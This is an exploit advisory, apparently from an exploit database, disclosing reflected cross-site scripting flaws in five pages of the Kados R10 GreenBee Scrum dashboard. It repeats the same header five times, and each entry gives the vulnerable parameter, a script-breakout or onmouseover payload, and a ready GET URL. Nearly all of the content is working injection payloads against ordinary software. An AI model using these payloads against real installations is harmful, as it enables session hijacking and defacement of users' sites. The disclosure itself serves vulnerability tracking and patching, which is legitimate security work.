Kados R10 GreenBee - Multiple XSS Injection

===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : forgetten.php 
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x002C18)</scRipt> 
# GET Method : http://localhost/kados_r10/kados/forgotten.php?'"--></style></scRipt><scRipt>alert(0x002C18)</scRipt> 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : index.php
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x001D23)</scRipt>
# GET Method : http://localhost/kados_r10/kados/index.php/'"--></style></scRipt><scRipt>alert(0x001D23)</scRipt>  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : i,postit_comment_to_trash.php
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x00433D)</scRipt> 
# GET Method : http://localhost/kados_r10/kados/postit_comment_to_trash.php?i='"--></style></scRipt><scRipt>alert(0x00433D)</scRipt>   
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : i,t,postit_comments.php
# Attack Pattern : x" onmouseover=alert(0x0027B0) x="&t=US
# GET Method : http://localhost/kados_r10/kados/postit_comments.php?i=x" onmouseover=alert(0x0027B0) x="&t=US    
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : i,project_card.php
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x003817)</scRipt>
# GET Method : http://localhost/kados_r10/kados/project_card.php?i='"--></style></scRipt><scRipt>alert(0x003817)</scRipt>
===========================================================================================